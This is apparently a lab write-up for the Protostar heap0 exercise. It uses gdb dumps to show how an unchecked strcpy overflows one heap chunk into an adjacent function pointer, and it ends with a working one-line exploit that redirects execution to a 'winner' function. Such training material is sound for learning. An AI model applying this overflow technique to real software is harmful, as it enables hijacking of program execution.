In this exercise we modify the heap memory to tweak the execution.

Let us set breakpoints after each malloc function and examine the memory addresses. The first malloc returns 0x804a008, the second returns 0x804a050.

(gdb) x/22x 0x804a000
0x804a000:	0x00000000	0x00000049	0x00000000	0x00000000
0x804a010:	0x00000000	0x00000000	0x00000000	0x00000000
0x804a020:	0x00000000	0x00000000	0x00000000	0x00000000
0x804a030:	0x00000000	0x00000000	0x00000000	0x00000000
0x804a040:	0x00000000	0x00000000	0x00000000	0x00000011
0x804a050:	0x00000000

Before each memory address there is 8 byte header which stores the size of the allocated space. In a more readable form:

header of first malloc:
0x804a000:	0x00000000	0x00000049

allocated space of the first malloc:
0x804a008:	0x00000000	0x00000000	0x00000000	0x00000000
0x804a018:	0x00000000	0x00000000	0x00000000	0x00000000
0x804a028:	0x00000000	0x00000000	0x00000000	0x00000000
0x804a038:	0x00000000	0x00000000	0x00000000	0x00000000	

header of second malloc:
0x804a048:	0x00000000	0x00000011

allocated space of the second malloc:
0x804a050:	0x00000000

The second malloc is a function pointer. This function is called at the end of the program. The goal of this exercise is to set the function pointer to the address of the winner function (0x08048464).

The strcpy before the last function call copies the passed argument to the space allocated by the first malloc. The solution is to copy 64 bytes (size of the data->name) plus 8 bytes (header of the second malloc) and the address of the winner in reverse order (little endian). The solution:

/opt/protostar/bin/heap0 `python -c ‘print “A”*72 + “\x64\x84\x04\x08″‘`

screen-shot-2016-11-26-at-21-47-58